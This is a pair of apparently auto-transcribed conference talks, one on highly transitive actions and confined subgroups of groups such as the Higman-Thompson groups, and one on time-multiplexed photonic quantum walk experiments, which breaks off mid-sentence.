So, first of all, if G is like that, it contains a normal subgroup which is isomorphic to a finitary alternating group. This is a very restrictive algebraic condition. Let me write a proposition-definition. We say that G is partially finitary if it satisfies one of the following equivalent conditions. The first one is this one. The second: there exists a highly transitive faithful action for which G contains an element of finite support. Whenever you have a highly transitive action, it is easy to see that as soon as you have a permutation of finite support in your group, you get the alternating group, just because, using high transitivity, you have all conjugates of the permutation, so you have a normal subgroup, as in the symmetric group. And three: the same, except that instead of highly transitive I can just assume that the action is primitive; primitive means that it does not preserve any non-trivial partition of omega. This is a classical theorem of Jordan, from the 19th century. So it is a class of groups that you understand very well, and moreover, in this case, the action of G on the set omega that appears is the unique highly transitive action of G. This is very classical theory of permutation groups, and the equivalence is not so hard to prove. The presence of finitely supported permutations in a highly transitive action is somehow a very special condition, and it is sort of a separate world; I am interested in studying highly transitive actions of groups beyond this case. So, more interesting examples, non-partially-finitary examples of highly transitive groups. One is non-abelian free groups. This is actually not so difficult to see; here I have a long list of references, and this is the original one, McDonough, in the 70s. But from this you can actually generalize these results a lot: surface groups also do this, this is due to Kitroser, and I could continue this a lot. The point is that surface groups share with free groups the fact of being hyperbolic groups, so this is also true for hyperbolic groups; it was generalized later by Chaynikov, and there were a lot of results for groups with hyperbolic properties establishing the existence of a faithful highly transitive action. The ultimate result in this setting is due to Hull and Osin, who proved that all acylindrically hyperbolic groups admit, actually, plenty of highly transitive actions. I will not give the definition of acylindrically hyperbolic group, but it is just a generalization of the notion of hyperbolic group that covers really a lot of examples, including hyperbolic groups, mapping class groups, and so on. There are more results for groups acting on trees, for instance due to Pierre Fima, François Le Maître, Soyoung Moon and Yves Stalder, and for subgroups of SL2, and so on. I will stop here for this list. And there is another source of examples, which is much closer to the topic of this conference. So, Nicolás, there is another question on the chat by Ville Salo. He says: sorry, I missed something, which action is highly transitive for these groups? Well, it is not obvious how to see it.
These groups come with a natural action on a hyperbolic space, for instance, but you do not see the action directly there. The way this is proven is by some sort of small cancellation theory over hyperbolic spaces, or at least arguments in that spirit. What you want to do is to construct a subgroup H so that the action of G on the coset space of H is highly transitive, and you approximate H successively. I am actually not super familiar with the proof, but it uses methods that resemble a lot the geometric versions of small cancellation theory. So it is really not explicit, and it is not obvious at all why such an action exists. A second class of examples, which is quite different, is the topological full groups. If you take X to be a Cantor set and you look at a minimal action of any group on X, then you can look at the topological full group of the action. Let me not write the definition, because I will not really use it, but let me say what it is: it is just the group of all homeomorphisms of X which locally coincide with elements of G. This is a very flexible group, and it is highly transitive on each of its orbits in X: whenever you have an orbit, you have so much flexibility that it acts highly transitively on it. So here you do see natural highly transitive actions, and a special case of this that will be important for me is the Higman-Thompson groups. Let me write it here: V_d. What it is: you take X now to be X_d, the one-sided shift space over a d-letter alphabet, so it is a Cantor set. Now, for w a finite word in the alphabet, so an element of the monoid generated by the alphabet, let C_w be the cylinder set, the set of all sequences that start with w. And you can define a very natural group which is locally given by: take a cylinder set and change the prefix w to another word. So V_d is the group of all homeomorphisms g of X such that there exist partitions into cylinders, X equal to the union of C_{w_1} up to C_{w_n} and X equal to the union of C_{v_1} up to C_{v_n}, with the same number of pieces, such that g acts as follows: whenever it sees an element which belongs to one of the pieces of the first partition, which means it starts with some word w_i, it changes that prefix to the corresponding word v_i. This is the Higman-Thompson group, and it is actually a special case of topological full group.
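As a concrete, entirely illustrative Python sketch (mine, not from the talk) of this prefix-replacement action: an element of V_d is described by two lists of words forming cylinder partitions, and it acts on a point, represented here by a long finite prefix of an infinite sequence, by swapping the matching prefix.

def check_prefix_free(words):
    """A cylinder partition in particular has no word that is a prefix of
    another; this simple check is enough for the toy examples below."""
    for a in words:
        for b in words:
            if a != b and b.startswith(a):
                raise ValueError(f"{a!r} is a prefix of {b!r}: not a partition")

def act(domain_words, range_words, point):
    """Apply the table element C_{w_i} -> C_{v_i} to `point`."""
    for w, v in zip(domain_words, range_words):
        if point.startswith(w):
            return v + point[len(w):]
    raise ValueError("point not covered by the domain partition")

# an element of V_2, permuting the cylinders 00, 01, 1
dom = ["00", "01", "1"]
rng = ["1", "00", "01"]
check_prefix_free(dom)
check_prefix_free(rng)

x = "0110100110010110"      # long prefix of a point of the 2-shift
print(act(dom, rng, x))     # the prefix "01" is replaced by "00"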
This discussion raises two sorts of problems. When people study highly transitive group actions, there are by now really a lot of results about the existence of such actions, which might be counterintuitive for some groups: many groups admit faithful highly transitive actions. But what is somehow missing from this discussion are the following two general problems. Okay, we know that highly transitive actions exist in abundance; the first problem is to find some structure, to classify the highly transitive faithful actions. These are very general problems, not questions about specific groups: beyond proving that such actions exist, once they exist one can try to find classification results to understand their structure. Actually, when we started this project, I think the only known result in this direction was the one that comes from the Jordan theorem in the 19th century; for none of these other cases was there any understanding of the possible highly transitive actions. And the second problem is that there is actually a lack of interesting obstructions to the existence of highly transitive actions. There are a few elementary properties, I do not want to get into this, it becomes more algebraic, but one can list a few kind of trivial obstructions, not so trivial, but not so difficult, for a given group G to admit a highly transitive action. This is something that is not well understood; it stays at a very algebraic and elementary level, and maybe I will say a bit more about this later. First I want to get to the actual topic of my talk, to the actual results I want to state. Remember that I started talking about confined subgroups; now the result I want to state is a link between the notion of confined subgroup and high transitivity, which says essentially that when you have a group acting highly transitively somewhere and you have a confined subgroup, the action of the confined subgroup essentially remains highly transitive, in the following sense. Theorem: let G acting on omega be a non-partially-finitary (so I want to exclude that case) highly transitive faithful action, and let H be a confined subgroup of G. Then there exists a cofinite H-invariant subset omega zero, so with finite complement, such that the action of H on omega zero is highly transitive. So the action of H remains highly transitive if you allow yourself to discard finitely many points. This can be useful in both directions: to understand confined subgroups once you have highly transitive actions, and, once you understand the confined subgroups of a group, to understand its highly transitive actions. That is the direction I want to explain, because the point is that a confined subgroup of a group can be much smaller, much more constrained, than the group itself, so the fact that the action of a much smaller group remains highly transitive is a strong constraint. So let me give some applications, two applications. We started at... how much time do I have? We started at 40, 38. So you have, like, 10 minutes. The first application is related to the classification problem. It is not an immediate corollary of this theorem, but the theorem can be used as a tool in certain cases to find some classifications, and I will just state an example, which you can maybe guess by now. Theorem two is that every faithful highly transitive action of the Higman-Thompson group V_d is conjugate to the action on an orbit in the Cantor set. So here you see a family of highly transitive actions coming from its natural action, each orbit gives you one, and these are the only ones. It is not immediate how to deduce this theorem from that one, but that is really the main tool.
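For reference, and in my own notation rather than the speaker's slides, the two statements just made can be written as follows.

Theorem 1 (restated). If $G \curvearrowright \Omega$ is a faithful, highly transitive, non partially finitary action and $H \leq G$ is a confined subgroup, then there is an $H$-invariant subset $\Omega_0 \subseteq \Omega$ with $|\Omega \setminus \Omega_0| < \infty$ such that $H \curvearrowright \Omega_0$ is highly transitive.

Theorem 2 (restated). Every faithful, highly transitive action of $V_d$ is conjugate to the action of $V_d$ on one of its orbits in the Cantor set $X_d$.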
There is some argument to get from here to there that I do not want to explain now, but let me just say the point: we know that in the standard action of V_d all stabilizers are confined subgroups, and even stabilizers of finite sets in the Cantor space are confined. So, using that theorem, this theorem essentially implies that stabilizers of finite sets in the Cantor set must act in a highly transitive way on the mysterious highly transitive action one is given. So it tells you that their action is very rich. You can turn this information around to say that if you are given an arbitrary highly transitive action of this group, and you look at the stabilizers of finite sets of points for that action, they must act in a very rich way on the Cantor set, because saying that these subgroups act highly transitively is sort of saying that your group decomposes as a product of these two subgroups. So now we can work with the action on the Cantor set: we know that the stabilizers must be very large subgroups of V with respect to its action on the Cantor set, and by working we managed to prove that actually they must be either the stabilizer of a point or the whole thing. That is roughly how one proceeds. Okay? Now I want to give you, or at least state, another application, which is related to the other problem, and which is also a pretext to advertise a class of groups that might be pertinent to this conference. I want to explain how to obtain a class of non-highly-transitive groups which do not satisfy the really obvious obstructions to high transitivity, and which arise from dynamical systems, groups of dynamical origin, I would say. So, for this, let us go back to real dynamics. Let me take (X, phi) a minimal Cantor system, where X is a Cantor set and phi is just a homeomorphism, so an action of Z. I want to define a group associated to the system which is sort of similar to the topological full group of the system, except that I will define a group which acts not on the Cantor set itself, but on the mapping torus of the system, the suspension space. For this, let me define Y_phi to be the suspension of the system, the quotient of X times R where I identify a point (x, t plus 1) with (phi of x, t); this is just the mapping torus in the usual sense. Now, the idea is to look at groups that act by homeomorphisms on this suspension space. For this, let me first give you... five minutes, right? Okay, I will make it. In order to understand this space, you can think of it as follows: it is obviously locally a Cantor set times R, and there is a natural system of coordinates that I want to introduce explicitly in order to define the groups I want to talk about, which is the following. Let me call them charts. For C a clopen set in the Cantor space and I an interval of length smaller than 1, you can look at the product C times I; this is a subset of the space you are quotienting, and it injects into the quotient, because no identification happens there. So you can identify it with a subset, which I will denote U_{C times I}, of the suspension space, and this identification gives you local coordinates of Cantor set times R in here.
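Written out (these are the standard definitions; the identification convention is my guess at the one on the slide):

\[
Y_\varphi=\bigl(X\times\mathbb{R}\bigr)\big/\bigl((x,\,t+1)\sim(\varphi(x),\,t)\bigr),
\qquad
U_{C\times I}=\text{image of }C\times I\text{ in }Y_\varphi,
\]

for $C\subseteq X$ clopen and $I\subset\mathbb{R}$ an interval of length smaller than $1$, so that $C\times I$ injects into the quotient and provides the "flow box" coordinates used in the definition that follows.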
So, I want to define a group which acts by homeomorphisms on this space, preserving each orbit of the natural lamination of the suspension space, but which in coordinates is given by piecewise linear homeomorphisms of R, so homeomorphisms that are piecewise affine, piecewise of the form ax plus b. Definition, and this is a family of groups that we defined with Michele Triestino: I denote by PL(phi) the group of all homeomorphisms of the suspension space of phi such that for every point in the suspension space there exists a chart containing the point, and a homeomorphism f from I to some other interval which is piecewise linear, with finitely many breakpoints for the derivative, such that when you look at g in coordinates in this chart, its restriction maps the chart onto the chart defined by C times f of I, and in coordinates what you see is just the identity times f. So basically you have these small flow boxes, and your group acts on these flow boxes in a piecewise linear way in the flow direction; "identity" means that it preserves every leaf, and the map is locally constant in the Cantor direction. These groups we introduced with Michele Triestino with a completely different motivation, because they are interesting groups that act on the real line. Here I take all possible piecewise linear homeomorphisms; if you restrict to a countable set of piecewise linear homeomorphisms, for instance the so-called dyadic ones, where you ask the slopes to be powers of two and the constant terms to be dyadic rationals, like in Thompson's groups, you also get a subgroup of that, which is analogous to the Thompson groups, if you know what that means. We were mostly interested in that one, because we proved that this subgroup is finitely generated when phi is a minimal subshift. So that gives you, for instance, finitely generated simple groups which act on the real line. It has other properties, but I do not want to talk about this now; I just want to say that this construction also gives the following. The theorem we prove is that if you take (X, phi) any minimal Cantor system, and you take G a subgroup of this group of piecewise linear homeomorphisms of the suspension flow just defined, which is such that the action of G on the suspension space is what I defined at the beginning, topologically nowhere free, far from being free, so a neighborhood of each point is fixed by some element, the group is large enough, then G has no faithful highly transitive action. I do not want to get too much into the details, but the point behind this result, which of course also uses the main result I stated before, is that under this condition the stabilizers of points of the suspension space are confined subgroups of G, and in this group the stabilizers of points look very, very different from the group itself. The reason is that when you have a minimal lamination like that, if you fix a point, then by definition you also fix a small transversal, and then, using the first return map, you can decompose the space into long rectangles which are preserved by every element of the stabilizer of the point, and so basically this tells you that the stabilizers of points there look like groups that act by piecewise linear homeomorphisms on an interval.
And this is a much more constrained class of groups, because, for instance, they cannot be simple (I said there are simple subgroups here, but these stabilizers cannot be simple, because you have the slopes at the endpoints), and it is known that they cannot have free subgroups, by a result of Brin and Squier. We actually generalize this result of Brin and Squier, a small generalization, to prove that they cannot be highly transitive, it is along the same lines, and then, using the theorem, we can pass from the stabilizers to the whole group. That is the main idea behind it, and I stop here. Thank you, Nicolás. Are there any questions online or here in the room? Yes. Yes, François Le Maître. So you mentioned that these Higman-Thompson groups can be viewed as topological full groups; do you have any other classes of topological full groups for which you hope to have a similar statement? No, so this is an excellent question, thanks, and there is a sort of immediate generalization, which is topological full groups associated to one-sided shifts of finite type. The Higman-Thompson group is the one behind the full shift over d letters, and you can look at one-sided shifts of finite type and you have a similar class of groups; it works for that. Otherwise no, and it is a super interesting question; we use some specific properties of the dynamics of the actions of these groups to deduce the theorem from the main one. Thanks. Other questions? On the chat, Samuel, there are some questions. So, can there be Z-actions that are highly transitive? I did not understand, sorry. Are there Z-actions that are highly transitive? No, no, sorry: of course, every Z-action is just either the action of Z on itself or the action on a cycle, so it is never highly transitive. But I should mention, among the sort of obvious obstructions: abelian groups are never highly transitive, and actually also solvable groups; every group satisfying a law does not admit any highly transitive action, so even solvable groups don't, for instance. Okay. So if there are no other questions, let us thank again Nicolás.
|
A subgroup of a group is confined if the closure of its conjugacy class in the Chabauty space does not contain the trivial subgroup. Such subgroups arise naturally as stabilisers of non-free actions on compact spaces. I will explain a result establishing a relation between the confined subgroups of a group and its highly transitive actions. We will see how this result allows us to understand the highly transitive actions of a class of groups of dynamical origin. This is joint work with Adrien Le Boudec.
|
10.5446/54096 (DOI)
|
What I want to do in the next 45 minutes is I want to talk to you about time-multiplex quantum walks. This is a research line which we have been doing in Paderborn for at least 10 years or longer. So we started that quite some while ago. And as you can see from this picture, we experimentalists. I'm aware that the audience is probably more theoreticians, but I hope I can inspire you to make some suggestions to us because we do need you guys. We have to know what should we do, what would be interesting to implement. Because Paderborn, I'm aware, is not the most famous place and quite frequently in an internet audience, people ask me, but where is that? Well, it's kind of in the middle of Germany. So this is Germany. This is Paderborn. And believe it or not, it's a really old historic town. We even have a cathedral in a bishop. It's a beautiful middle, well, little scale, German town, and we enjoy working there. So this is the cathedral. This is the smallest river in Germany. This is the town hall. So it's a quite nice place. We like to be there, but there's a second reason why we are there and what's important for us. IKO stands for Integrated Quantum Optics at Paderborn University. And one thing which makes this place special is that we have an on-site nonlinear wave guide fabrication facility there. We process different nonlinear wave guides that let's you know a bit, put us into two different first aid wave guide writing, periodic polling. Now, why is it important? Well, it's important because if we want to implement new systems, modern systems, we also need the technology. And although you're furthest away, maybe I want to do a little bit of advertisement to tell you why we need that. So let me tell you a little bit more about my group. So we do what I just say, these technology things, Christopher Eign is a group leader, where we really go to the lab, to the clean rooms and we fabricate things. That's something which is maybe rather different. And actually I started that business also approximately 10 years ago. And I have to tell you it's also big fun. We build out of these things devices. The group leader there is Haraj Haman. And devices really means where this, we might ask, where's the difference? Well, you first have to start from something. So you just have a wafer and then you have to structure them and build them. And then you go to the optics labs coming already closer. And you build these little devices where you, well, here you see that there's electrodes and so on. And then we do the quantum experiments. The group leader there and my group is Benjamin Brecht. And this is what you know. This is, I call this group quantum networks. And here you see quite prominently quantum walks. We do that because I think a really spill-leash and photonic for quite some time, we didn't develop so much technology, but if you really want to do this in the photonic platforms, we do need more technology altogether. Now what is our goal? Well, in very general terms, what I'm interested with my group is to build large scale quantum networks. Why networks? What does these networks mean? And what is the idea behind networks? Well, this comes very close to what you used. I think a network, and quantum work is a special network, is an ideal platform to use that as a model system. We can really take away a lot of these complexity, which is just technical. And we can understand in these models the effects, what effects to really influence what properties. 
And if you think about applications — in the end I'm also driven by applications, but in a rather abstract way; of course, the fundamental side is also interesting — networks, people immediately associate with the quantum internet. Yes, that's true. Also to understand dynamics in an internet-like system it's important to have these networks, but it reaches far beyond that. We can have model systems, well, for neural networks in the brain. We can study transport phenomena, and a lot of other things, and we can use these networks to really understand what's going on. Now I hope that I convinced you that a network is an interesting system, and if you go to computer science, of course it is. If you look at what machine learning is based on at the end, a lot of modern architecture in computer science relies on this network idea. I think one thing which is not so clear is: what is really the role of quantum physics if you have complex large-scale structures — and the networks stand for that complex large-scale structure. What does it mean to go quantum? And although I have been doing this research, I think, for more than 10 to 15 years, I still think that the question of quantumness in these networks is still quite an open question. In particular when you talk about quantum walks, and I will try to give one side of the story today in my talk, and we have a second talk from my group, given by Shum, and he will show you the second side. But really, this is what drives the research: I want to understand what it means to go quantum. Now from the experimental side, if you do not want to do that only in theory but also experimentally, you need a multi-dimensional photonic quantum system. And this is, again, a broader thing. I am not coming only from quantum walk research, and if you ask where that research comes from, well, it comes from quantum information science and quantum technology. And I think it's fair to say the boom really started in 2001, when Knill, Laflamme and Milburn realized that you can use only linear optical networks together with measurements to build a full-fledged quantum computer. Those are ideas that are still very important, also in the framework of quantum walks, because it tells you: if you combine linear networks with measurements, you achieve something which is amazing — you can have a universal quantum computer. And this is also one of the motivations. People ask you, but why are you interested? And I say, we don't know where really the border between classical and quantum lies in general. And then they ask, why do you think that? I say, well, just go back to Knill, Laflamme and Milburn. There you see already: it's just a linear network, fed by photons, and you achieve a universal quantum computer. Somewhere in between, a lot of the algorithms we try to explore will lie. And then, of course, to build this beast, unfortunately, as experimentalists, this is still a tremendous effort. It doesn't matter whether it's a few hundred or a thousand photons that you have to put together — we can't do it. This is a matter of fact at the moment. We'd like to say, well, yes, we can do that. Well, if we are honest, it's difficult. It's horribly difficult. And this is why I showed you these technology tools we need. I think the development there is not finished yet. We are in the middle of developing these things, but we can't do that yet.
And because we can't do that, quantum walks are perfect, because they are kind of one of the simplest things we can do, and still they are very meaningful. And I think in this audience I don't have to make more advertising for the quantum walk, but this is how I see it. On the bottom, talking about photons, I have to talk about that: implementing multi-photon systems; of course quantum communication is also important, and there high-dimensional systems are also interesting. So a little bit more of what we do in the group. We have different strategies, we do different work. We do integrated optics. We do something which we call temporal modes of pulsed light. I will not be talking about these two topics. What I want to concentrate on in this talk is time-multiplexed quantum walks, which we find a really interesting system to study. With that, let me come to the outline of the talk. I will start with an introduction. I know that you're all familiar with quantum walks, but this is meant to give you my impression of how I look at the field. And then I want to talk about quantum walk setups. And again, because I think there are a lot of new people coming into the field, which is great, it might also be good to give you a little bit of a review of what we have been doing in my group over the last 10 years, and I will come to a new setup there. At the end, I will talk about two applications — well, not really direct applications in the sense that I build a quantum computer, but applications to fundamental science. So let me get started with the introduction. Well, what is a quantum walk? This is my vision of it. You have this drunken person. Classically, he throws a coin, and depending on the coin toss he makes a step to the left or to the right, and we are back at the Galton board, which is well known, I think, in this community. What you get out of that is a binomial distribution, and you model with that diffusive propagation. And this is already telling you, well, you can model propagation by that. This probability distribution is characterized by the fact that the variance is proportional to the number of steps. On the contrary, we have the quantum side. We need the coin — well, in the coined, discrete-time quantum walk; this is how it's formulated. The coin typically is formulated as a spin state. In optics, I prefer to say a polarization; it's exactly the same — take the Schrödinger representation here and you're back to the same thing. And depending on the polarization, you make steps to the left or the right. Well, and what you get out of that, you get a lot of interferences. You monitor the probability distribution of the coin, the quantum state. Of course, we're talking about the superposition principle, and we get a ballistic distribution, and all of a sudden the variance is proportional to the square of the number of steps. Now, with that few steps you don't see that big a difference, but if you go to 100 steps, you see there clearly the quantum walk and the classical walk. Okay. Already there — putting that on the computer is trivial, but if you ask the experimentalist, there you see already the first challenge. You do a few hundred steps, and then you need a few hundred positions. Wait a minute, that's an awful number of modes. How the heck can you get a few hundred steps to see the differences you want to see? And quite frequently, I should be honest, we are limited to 10 steps, and then it looks more like that. And that's not so impressive.
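To make the variance comparison concrete, here is a minimal, self-contained sketch (my own illustrative code, not the group's lab software) of a discrete-time Hadamard walk on a line next to the classical random walk; the quantum variance grows quadratically with the step number, the classical one linearly.

```python
from math import comb
import numpy as np

def hadamard_walk(steps):
    """Discrete-time quantum walk on a line: Hadamard coin, start at the origin in |H>."""
    pos = np.arange(-steps, steps + 1)
    psi = np.zeros((len(pos), 2), dtype=complex)   # column 0 = |H>, column 1 = |V>
    psi[steps, 0] = 1.0                            # walker at position 0
    H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)   # Hadamard coin
    for _ in range(steps):
        psi = psi @ H.T                            # coin toss at every position
        shifted = np.zeros_like(psi)
        shifted[1:, 0] = psi[:-1, 0]               # |H> amplitude steps right
        shifted[:-1, 1] = psi[1:, 1]               # |V> amplitude steps left
        psi = shifted
    return pos, np.sum(np.abs(psi) ** 2, axis=1)

steps = 100
pos, p_q = hadamard_walk(steps)
var_q = np.sum(p_q * pos**2) - np.sum(p_q * pos)**2

x_c = np.arange(-steps, steps + 1, 2)              # classical walker: even offsets only
p_c = np.array([comb(steps, k) for k in range(steps + 1)], dtype=float) / 2**steps
var_c = np.sum(p_c * x_c**2) - np.sum(p_c * x_c)**2

print(f"after {steps} steps: quantum variance ~ {var_q:.0f}, classical variance ~ {var_c:.0f}")
```

With 100 steps the classical variance comes out as exactly the step number, while the quantum variance is orders of magnitude larger, since it scales with the square of the step number — the diffusive-versus-ballistic spreading described above.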
And if you're talking about how the variance spreads, it's also not so impressive. So you already see there one challenge. You really have to get an awful number of steps in the system. If you can do that, the applications we have in mind is, in general, now we go, say, by random walks in classical optics, we know them very well. They're used for all kinds of simulations, classical processes. Here, Brownian motions. For me, it was quite interesting. Like mathematicians, you probably know better than I. This is still a research field, which is really very modern research in mathematics, if you look into that. You can have model biological systems, how tears run around. And information science, well, I think by now it's known that also the Google search is based on random walk algorithms. And then it's not very surprising to say, well, if you do that in classical systems, already to simulate all systems, do the same thing to use a simulator for semiconductors to fix problems. And we can come back to that. Quantum biology, if you want, this again is some topic which is actually by now rather old. And try to see, can we find you, competition, simulation algorithms? And I'm sure you're much more expert than I am. Now what makes a quantum system quantum in that respect? Well, this is, take this famous graph. Well, what really does make it quantum at that point? This is a typical way you say, you have the classical world, you have a particle, and then things are very nice. As soon as you cross the border and you have a single particle, and you have interference phenomena, you have other ways, particle, dualism, and you make it quantum. Well, in optics, it's sometimes a little bit difficult. So the results I will show you today, we criticize always the same thing. Hey, guys, you're not quantum. Yes, if you do come from a classical optics world, and I say that already, yes, we are not quantum. If you look at the modeling, we can perfectly simulate all quantum box theory things. So we have a very integrated interference phenomena, and this makes it quantum. If you like, I'm happy to discuss this issue much more in detail with you, and we are looking into that topic too. I'm putting that already now, because I think quantum is a notion which is rather difficult here, and depends where you're coming from. For computer scientists, they are always perfectly happy with our work. This is a, it's not done by a standard classical computer. An optics person, I'm completely understood, I'm coming also from optics, why they're absolutely not happy with us at all. I like the experiments. I like to see what we can do. So let me go my view on the theory, what we need. Well, this is something which is standard. We need a Hamiltonian which operates on two Hilbert spaces, one on the position space, one on the coin states, and then we have a propagation in this Hilbert space where we operate on these tensor products, and we always have these different coefficients, and this of course is appropriately distributed. In the lab, we start with a single photon which has a polarization, for example, horizontal. We initialize our state, it's in some position, in some polarization. 
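Just to have the framework from this part of the talk in formulas — the standard textbook way of writing it, with my own symbols rather than the slide's notation — the walker lives in the tensor product of a position and a coin (polarization) space, and one step is a coin operation followed by a polarization-conditioned shift, the operations described in the next part of the talk:

$$\mathcal{H}=\mathcal{H}_{\mathrm{pos}}\otimes\mathcal{H}_{\mathrm{coin}},\qquad |\psi_0\rangle=|x_0\rangle\otimes|c_0\rangle,$$
$$U_{\mathrm{step}}=S\,\big(\mathbb{1}_{\mathrm{pos}}\otimes C\big),\qquad S=\sum_{x}\Big(|x{+}1\rangle\langle x|\otimes|H\rangle\langle H|+|x{-}1\rangle\langle x|\otimes|V\rangle\langle V|\Big),$$

and after $n$ steps the state is $|\psi_n\rangle=U_{\mathrm{step}}^{\,n}|\psi_0\rangle$, whose position and polarization statistics are the distributions monitored in the experiment.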
Then the first thing we do is we put it through a coin operator, in our case it's a real coin operator, so that means a half wave plate which changes the polarization according to the coin operator thing, so this is a unitary operation, and this is a general one which we can do with phi's and these, well, we have all kind of different wave plates, for example, Hadamard if you take the right choice, and then depending on the polarization, we have a step operation to the left or the right, and you see that, and this is basically what's a mathematical terms. This is really just introducing how the system works. Now we have done one step, well, if you want to have a quantum walk, we iterate that. So the whole sequence I just showed you, initialize our state, coin operation, step left right, coin operation, step left right, and so on, and at the end, we want to monitor probability distributions, ideally different in coin and position space. Okay, how do we implement this? Well, it's almost there already, so I think I gave you already some way how to implement this. But what are the important features we have to do there, what is this really what you need? And I like to characterize the systems in different way. What do you need? Well, one thing which is I think quite important if you want to do simulations, so if you want to change something, you want to reconfigure your system. So you don't want to have static things, but you want to be able to play with the coins. So reconfigurability is one category. But also equally important, maybe even more important, you need a stable system, because stable for us means that the evolution does what you just showed there. If you don't do anything in the lab, it's getting shaking like crazy, and the phases you just have to integrate all over the place and then that's also not very helpful. And I think one of the most challenging thing you want to have is scalable. And I showed you that at the beginning, you don't want to have five steps, you don't want to have 10 steps. Ideally, you would like to have hundreds and thousands, and I should say this is a challenge as far as I know, if somebody else. So this is really something which is tricky. There are different platforms, and depending on what you want to do, there are advantages and disadvantages. Of course, I have to advertise the time multiplexing here. But bulk optics, and I think, well, this is not a very, well, sorry, up to date, like it's the beginning, but bulk optics, I always said, is very reconfigurable. It has very bad properties and stability and scalability, and I should be careful with that. I know the Charny-Weypans group these days, they do in bulk, just amazing things, but definitely it's more tricky to get them stable and scalable. There's integrated photonics, I think, again, this is a lot of work has been done, and we are also working in that field. I also think that it's really good, but I think it's fair to say that reconfigurability is much more challenging. And time multiplexing, in principle, is a good platform if you want to achieve these things. So let me go to our setups, what we have been doing, the quantum box setups over the last year. So this is the time multiplex setup, and this is the setup where Charny-Weypans works. We have an input set, which we can put into the loop with electro-optic modulators. This is an electro-optic modulator where we can change the internal state together with the half-wave plates. And then we have a double-loop structure. 
We divide here the state according to its polarization, and it travels through two different loops. It gets recombined, and then we loop it back. And here we couple some of the light out to detect what the system does. So what does that setup do? Well, it goes as follows. The pulse comes in, a single photon state. We have a half-wave plate, and this is the coin operation. This is the double loop, these two different fiber lengths. So you see that it's getting split according to its polarization, and it travels along different paths. And thus we implement in time the step operation of our walk: the relative shift in time corresponds to the steps in position space. Now here we have come in, here we're at that position, and now we loop it back. What that does is, so we have the first step done, we bring it back to the same system. We go through that loop again, and because the paths are equal you can see that here two of the paths overlap again, and depending on the position you complete the next step. And this you iterate over and over again. One nice feature: you can replace the half-wave plate with electro-optic modulators, so we can address every individual path individually. So we have dynamic reconfigurability. And this is actually a quite old system by now. We started that — the first publication was in 2010. This is from 2011, over at least 28 steps. And here you see this would be the classical system, and experiment and quantum walk theory, gray and blue. And you see quite nicely that we can reproduce these quantum walks really quite nicely. Doing that many steps in bulk optics would mean an enormous number of beam splitters and detectors, and this is still a challenge. I know that we can do some of these things these days, but I think this is really something which we can do nicely. What I like about this is, I say, it's resource efficient, because we're using the same system again and again. And maybe one thing which is even more important: it has an ideal homogeneity. If you implement it differently, all these elements can be slightly different, and you get exponential errors because you're repeating over and over again. Here it's always the same error, and I think it's a really good thing. This is why we get extremely clean data. What did we do with that? I think we have to speed up a little bit. Okay. Well, the first thing which came to our mind was to simulate going from classical to quantum. And how do you do that? Well, we have our quantum walk. We artificially introduce fluctuations by programming random phases onto all of these different positions. That corresponds to fast fluctuations in position space. And we chose these phases out of the interval from minus pi to pi, in steps of pi over 4. And what you expect is that you suppress all interferences, and we know that then you go to the classical walk and you should get your binomial distribution. And here you see what you get. This is actually also data, experiment and theory. It fits extremely nicely. On a logarithmic plot you see this parabola. Well, another thing you then do, you say, okay, what other types of things are interesting? Well, the next thing we did is, we did again a random choice of phases, but now we did it position dependent. So at the same position we imprinted the same phase at all the different times; the phases are drawn from a completely flat distribution. Well, why did we do that? Well, this is Anderson-like localization. So this is what you expect, and here is the data — theory and experiment — and it works also quite nicely.
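As a hedged illustration of these two disorder experiments (again my own toy code, with a uniform phase distribution rather than the exact discrete set of phases used in the lab): fresh random phases at every step wash out the interference and give diffusive, classical-like spreading, while phases that are random in position but fixed in time give Anderson-like localization.

```python
import numpy as np

def disordered_walk_variance(steps, mode, rng):
    """Hadamard walk with position-dependent random phases; mode is 'dynamic' or 'static'."""
    n = 2 * steps + 1
    psi = np.zeros((n, 2), dtype=complex)
    psi[steps, 0] = 1.0                               # start at the origin in |H>
    H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)
    static_phases = rng.uniform(-np.pi, np.pi, n)     # fixed disorder pattern
    for _ in range(steps):
        phases = static_phases if mode == "static" else rng.uniform(-np.pi, np.pi, n)
        psi = (np.exp(1j * phases)[:, None] * psi) @ H.T   # phase imprint, then coin
        shifted = np.zeros_like(psi)
        shifted[1:, 0] = psi[:-1, 0]
        shifted[:-1, 1] = psi[1:, 1]
        psi = shifted
    pos = np.arange(-steps, steps + 1)
    p = np.sum(np.abs(psi) ** 2, axis=1)
    return np.sum(p * pos**2) - np.sum(p * pos)**2

rng = np.random.default_rng(seed=1)
steps, runs = 60, 50
for mode in ("dynamic", "static"):
    var = np.mean([disordered_walk_variance(steps, mode, rng) for _ in range(runs)])
    print(f"{mode} disorder: variance ~ {var:.1f} after {steps} steps (averaged over {runs} runs)")
```

Averaged over disorder realizations, the dynamic case spreads diffusively (variance of the order of the step number), whereas the static case stays localized with a much smaller variance, mirroring the measured curves described above.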
For us it was the first experiment to see this, to show the strength of the system. And then you can change how much you diffuse your phases, how many different phases you choose, and in that way you can have controlled dynamics here. You see, we look at the variances as a measure, and you see here first the variance when there's no phase, and then for these two different scenarios we see indeed that behavior, also for the localization, compared to this value of the variance. And this is quite old work, but I thought it's quite interesting to bring it to your mind here, because I think it's still up to date and you can still do these things quite nicely. The next step we did is, well, if you have a 1D system, can you also do a 2D system, where you have now two position and two coin states? Well, what you have to do for a two-particle quantum walk — and it's similar to having two single walkers on a line — is you have to have two positions and two coins, a position and coin state for particle one and two, and you have a four-dimensional coin. Well, for that you can also use your quantum walk, the original system with this looped system, but we add there now an additional loop. You have empty ports here, and what that means is that we can have four coin states, by defining horizontal and vertical polarization on the one hand, and then two spatial modes, so we could travel back either the path we had, or we open that second path, and now we have a more complicated pattern of how the pulses can travel. So here we come in, now we split them, and they come back here, and now the pulse that I mentioned can also walk back along that second path, which corresponds to another coin state. The interesting part of that — and to understand why that all works is not very trivial — but the interesting thing is that we can implement highly non-trivial coins, because we have half-wave plates here and here and also on the path back, so we can implement four-dimensional coins which are highly non-trivial. And the detection again is done with two detectors there, and this is then kind of the time series, so we have to distinguish between different time bins, which correspond to horizontal and vertical, and we study the evolution; this was step 10. So what we could do: we simulated 12 steps on a 2D lattice with 107 positions and more than 500 modes. So this is an experiment where, from the complexity, it's still rather well controlled, and you can do that. And there we then looked into the system, and you can understand the system quite nicely. One interpretation is that you look 